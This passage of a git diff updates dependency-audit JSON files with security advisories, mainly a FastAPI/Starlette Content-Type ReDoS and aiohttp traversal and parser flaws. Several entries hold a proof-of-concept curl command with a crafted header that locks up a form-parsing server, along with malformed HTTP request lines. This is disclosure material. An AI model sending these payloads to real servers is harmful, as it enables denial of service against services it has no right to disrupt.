ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + 
"database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-93gm-qmq6-w238" + ], + "aliases": [ + "GHSA-93gm-qmq6-w238" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/ssh-mitm-requirements.audit.json b/audits/ssh-mitm-requirements.audit.json index 95de2360..037f49a0 100644 --- a/audits/ssh-mitm-requirements.audit.json +++ b/audits/ssh-mitm-requirements.audit.json @@ -139,7 +139,7 @@ ], "vulnerabilities": [ { - "modified": "2024-01-29T09:46:53Z", + "modified": "2024-02-05T23:31:03Z", "published": "2023-12-18T19:22:09Z", "schema_version": "1.6.0", "id": "GHSA-45x7-px36-x8w8", @@ -207,7 +207,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" 
@@ -216,108 +216,6 @@ } ], "versions": [ - "0.1-bulbasaur", - "0.1-charmander", - "0.9-doduo", - "0.9-eevee", - "0.9-fearow", - "0.9-gyarados", - "0.9-horsea", - "0.9-ivysaur", - "1.0", - "1.1", - "1.10.0", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.10.5", - "1.10.6", - "1.10.7", - "1.11.0", - "1.11.1", - "1.11.2", - "1.11.3", - "1.11.4", - "1.11.5", - "1.11.6", - "1.12.0", - "1.12.1", - "1.12.2", - "1.12.3", - "1.12.4", - "1.13.0", - "1.13.1", - "1.13.2", - "1.13.3", - "1.13.4", - "1.14.0", - "1.14.1", - "1.14.2", - "1.14.3", - "1.15.0", - "1.15.1", - "1.15.2", - "1.15.3", - "1.15.4", - "1.15.5", - "1.16.0", - "1.16.1", - "1.16.2", - "1.16.3", - "1.17.0", - "1.17.1", - "1.17.2", - "1.17.3", - "1.17.4", - "1.17.5", - "1.17.6", - "1.18.0", - "1.18.1", - "1.18.2", - "1.18.3", - "1.18.4", - "1.18.5", - "1.2", - "1.3", - "1.3.1", - "1.4", - "1.5.1", - "1.5.2", - "1.5.4", - "1.6", - "1.6.1", - "1.6.2", - "1.6.3", - "1.6.4", - "1.7", - "1.7.1", - "1.7.2", - "1.7.4", - "1.7.5", - "1.7.6", - "1.7.7.1", - "1.7.7.2", - "1.8.0", - "1.8.1", - "1.9.0", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.0.8", - "2.0.9", - "2.1.0", - "2.1.1", - "2.1.2", - "2.1.3", - "2.1.4", - "2.1.5", - "2.1.6", "2.10.0", "2.10.1", "2.10.2", @@ -328,19 +226,6 @@ "2.11.0", "2.11.1", "2.12.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.3.0", - "2.3.1", - "2.3.2", - "2.3.3", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", "2.5.0", "2.5.1", "2.6.0", @@ -409,6 +294,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" diff --git a/audits/theharvester-requirements.audit.json b/audits/theharvester-requirements.audit.json index fcc588c6..c20cdd92 100644 --- a/audits/theharvester-requirements.audit.json 
+++ b/audits/theharvester-requirements.audit.json
@@ -1,8 +1,8 @@
 [
 {
 "package": {
- "name": "aiohttp",
- "version": "3.9.1",
+ "name": "fastapi",
+ "version": "0.109.0",
 "ecosystem": "PyPI"
 },
 "dependency_groups": [
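Review bot: The first array element is rewritten in place from aiohttp 3.9.1 to fastapi 0.109.0, which turns two unrelated findings into a positional diff instead of a removal plus an addition; a reader cannot tell from this hunk whether the aiohttp directory-traversal finding (GHSA-5h86-8mv2-jq9f, replaced in the next hunk) was resolved by an upgrade or merely moved further down the file. Having the audit tool sort package entries by name and each `vulnerabilities` list by id before serializing would make regenerated diffs show what actually changed. The enclosing array continues past this hunk.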
@@ -10,241 +10,305 @@ ], "vulnerabilities": [ { - "modified": "2024-02-05T03:46:53Z", - "published": "2024-01-29T22:31:03Z", + "modified": "2024-02-05T17:28:33Z", + "published": "2024-02-05T17:01:54Z", "schema_version": "1.6.0", - "id": "GHSA-5h86-8mv2-jq9f", + "id": "GHSA-qf9m-vfgh-m389", "aliases": [ - "CVE-2024-23334" + "CVE-2024-24762" ], - "summary": "aiohttp is vulnerable to directory traversal", - "details": "### Summary\nImproperly configuring static resource resolution in aiohttp when used as a web server can result in the unauthorized reading of arbitrary files on the system.\n\n### Details\nWhen using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if a given file path is within the root directory.This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.\n\ni.e. An application is only vulnerable with setup code like:\n```\napp.router.add_routes([\n web.static(\"/static\", \"static/\", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability\n])\n```\n\n### Impact\nThis is a directory traversal vulnerability with CWE ID 22. When using aiohttp as a web server and enabling static resource resolution with `follow_symlinks` set to True, it can lead to this vulnerability. This vulnerability has been present since the introduction of the `follow_symlinks` parameter.\n\n### Workaround\nEven if upgrading to a patched version of aiohttp, we recommend following these steps regardless.\n\nIf using `follow_symlinks=True` outside of a restricted local development environment, disable the option immediately. 
This option is NOT needed to follow symlinks which point to a location _within_ the static root directory, it is _only_ intended to allow a symlink to break out of the static directory. Even with this CVE fixed, there is still a substantial risk of misconfiguration when using this option on a server that accepts requests from remote users.\n\nAdditionally, aiohttp has always recommended using a reverse proxy server (such as nginx) to handle static resources and _not_ to use these static resources in aiohttp for production environments. Doing so also protects against this vulnerability, and is why we expect the number of affected users to be very low.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8079/files", + "summary": "FastAPI Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. 
This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn 
main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", "affected": [ { "package": { "ecosystem": "PyPI", - "name": "aiohttp", - "purl": "pkg:pypi/aiohttp" + "name": "fastapi", + "purl": "pkg:pypi/fastapi" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.0.5" + "introduced": "0" }, { - "fixed": "3.9.2" + "fixed": "0.109.1" } ] } ], "versions": [ - "1.0.5", - "1.1.0", - "1.1.1", - "1.1.2", - "1.1.3", - "1.1.4", - "1.1.5", - "1.1.6", - "1.2.0", - "1.3.0", - "1.3.1", - "1.3.2", - "1.3.3", - "1.3.4", - "1.3.5", - "2.0.0", - "2.0.0rc1", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.1.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.2.5", - "2.3.0", - "2.3.0a1", - "2.3.0a2", - "2.3.0a3", - "2.3.0a4", - "2.3.1", - "2.3.10", - "2.3.1a1", - "2.3.2", - "2.3.2b2", - "2.3.2b3", - "2.3.3", - "2.3.4", - "2.3.5", - "2.3.6", - "2.3.7", - "2.3.8", - "2.3.9", - "3.0.0", - "3.0.0b0", - "3.0.0b1", - "3.0.0b2", - "3.0.0b3", - "3.0.0b4", - "3.0.1", - "3.0.2", - "3.0.3", - "3.0.4", - "3.0.5", - "3.0.6", - "3.0.7", - "3.0.8", - "3.0.9", - "3.1.0", - "3.1.1", - "3.1.2", - "3.1.3", - "3.2.0", - "3.2.1", - "3.3.0", - "3.3.0a0", - "3.3.1", - "3.3.2", - "3.3.2a0", - "3.4.0", - "3.4.0a0", - "3.4.0a3", - "3.4.0b1", - "3.4.0b2", - "3.4.1", - "3.4.2", - "3.4.3", - "3.4.4", - "3.5.0", - "3.5.0a1", - "3.5.0b1", - "3.5.0b2", - "3.5.0b3", - "3.5.1", - "3.5.2", - "3.5.3", - "3.5.4", - "3.6.0", - "3.6.0a0", - "3.6.0a1", - "3.6.0a11", - "3.6.0a12", - "3.6.0a2", - "3.6.0a3", - "3.6.0a4", - "3.6.0a5", - "3.6.0a6", - "3.6.0a7", - "3.6.0a8", - "3.6.0a9", - "3.6.0b0", - "3.6.1", - "3.6.1b3", - "3.6.1b4", - "3.6.2", - "3.6.2a0", - "3.6.2a1", - "3.6.2a2", - "3.6.3", - "3.7.0", - "3.7.0b0", - "3.7.0b1", - "3.7.1", - "3.7.2", - "3.7.3", - "3.7.4", - "3.7.4.post0", - "3.8.0", - "3.8.0a7", - "3.8.0b0", - "3.8.1", - "3.8.2", - "3.8.3", - "3.8.4", - "3.8.5", - "3.8.6", - "3.9.0", - "3.9.0b0", - "3.9.0b1", - "3.9.0rc0", - "3.9.1" + "0.1.0", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + 
"0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.100.0", + "0.100.0b1", + "0.100.0b2", + "0.100.0b3", + "0.100.1", + "0.101.0", + "0.101.1", + "0.102.0", + "0.103.0", + "0.103.1", + "0.103.2", + "0.104.0", + "0.104.1", + "0.105.0", + "0.106.0", + "0.107.0", + "0.108.0", + "0.109.0", + "0.11.0", + "0.12.0", + "0.12.1", + "0.13.0", + "0.14.0", + "0.15.0", + "0.16.0", + "0.17.0", + "0.18.0", + "0.19.0", + "0.2.0", + "0.2.1", + "0.20.0", + "0.20.1", + "0.21.0", + "0.22.0", + "0.23.0", + "0.24.0", + "0.25.0", + "0.26.0", + "0.27.0", + "0.27.1", + "0.27.2", + "0.28.0", + "0.29.0", + "0.29.1", + "0.3.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.36.0", + "0.37.0", + "0.38.0", + "0.38.1", + "0.39.0", + "0.4.0", + "0.40.0", + "0.41.0", + "0.42.0", + "0.43.0", + "0.44.0", + "0.44.1", + "0.45.0", + "0.46.0", + "0.47.0", + "0.47.1", + "0.48.0", + "0.49.0", + "0.49.1", + "0.49.2", + "0.5.0", + "0.5.1", + "0.50.0", + "0.51.0", + "0.52.0", + "0.53.0", + "0.53.1", + "0.53.2", + "0.54.0", + "0.54.1", + "0.54.2", + "0.55.0", + "0.55.1", + "0.56.0", + "0.56.1", + "0.57.0", + "0.58.0", + "0.58.1", + "0.59.0", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.6.4", + "0.60.0", + "0.60.1", + "0.60.2", + "0.61.0", + "0.61.1", + "0.61.2", + "0.62.0", + "0.63.0", + "0.64.0", + "0.65.0", + "0.65.1", + "0.65.2", + "0.65.3", + "0.66.0", + "0.66.1", + "0.67.0", + "0.68.0", + "0.68.1", + "0.68.2", + "0.69.0", + "0.7.0", + "0.7.1", + "0.70.0", + "0.70.1", + "0.71.0", + "0.72.0", + "0.73.0", + "0.74.0", + "0.74.1", + "0.75.0", + "0.75.1", + "0.75.2", + "0.76.0", + "0.77.0", + "0.77.1", + "0.78.0", + "0.79.0", + "0.79.1", + "0.8.0", + "0.80.0", + "0.81.0", + "0.82.0", + "0.83.0", + "0.84.0", + "0.85.0", + "0.85.1", + "0.85.2", + "0.86.0", + "0.87.0", + "0.88.0", + "0.89.0", + "0.89.1", + "0.9.0", + 
"0.9.1", + "0.90.0", + "0.90.1", + "0.91.0", + "0.92.0", + "0.93.0", + "0.94.0", + "0.94.1", + "0.95.0", + "0.95.1", + "0.95.2", + "0.96.0", + "0.96.1", + "0.97.0", + "0.98.0", + "0.99.0", + "0.99.1" ], "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json" + "last_known_affected_version_range": "<= 0.109.0", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json" } } ], "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f" + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" }, { "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23334" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" }, { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8079" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8079/files" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b" + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" }, { "type": "PACKAGE", - "url": "https://github.com/aio-libs/aiohttp" + "url": "https://github.com/tiangolo/fastapi" }, { "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" } ], "database_specific": { "cwe_ids": [ - "CWE-22" + "CWE-400" ], "github_reviewed": true, - "github_reviewed_at": "2024-01-29T22:31:03Z", - "nvd_published_at": 
"2024-01-29T23:15:08Z", - "severity": "MODERATE" + "github_reviewed_at": "2024-02-05T17:01:54Z", + "nvd_published_at": "2024-02-05T15:15:09Z", + "severity": "HIGH" } - }, + } + ], + "groups": [ { - "modified": "2024-02-05T03:47:10Z", - "published": "2024-01-29T22:30:07Z", - "schema_version": "1.6.0", - "id": "GHSA-8qpw-xqxj-h4r2", - "aliases": [ - "CVE-2024-23829" + "ids": [ + "GHSA-qf9m-vfgh-m389" ], - "summary": "aiohttp's HTTP parser (the python one, not llhttp) still overly lenient about separators", - "details": "### Summary\nSecurity-sensitive parts of the *Python HTTP parser* retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input.\n\n### Details\nThese problems are rooted in pattern matching protocol elements, previously improved by PR #3235 and GHSA-gfw2-4jvh-wgfg:\n\n1. The expression `HTTP/(\\d).(\\d)` lacked another backslash to clarify that the separator should be a literal dot, not just *any* Unicode code point (result: `HTTP/(\\d)\\.(\\d)`).\n\n2. The HTTP version was permitting Unicode digits, where only ASCII digits are standards-compliant.\n\n3. Distinct regular expressions for validating HTTP Method and Header field names were used - though both should (at least) apply the common restrictions of rfc9110 `token`.\n\n### PoC\n`GET / HTTP/1\u00f61`\n`GET / HTTP/1.\ud835\udfd9`\n`GET/: HTTP/1.1`\n`Content-Encoding?: chunked`\n\n### Impact\nPrimarily concerns running an aiohttp server without llhttp:\n 1. **behind a proxy**: Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling.\n 2. 
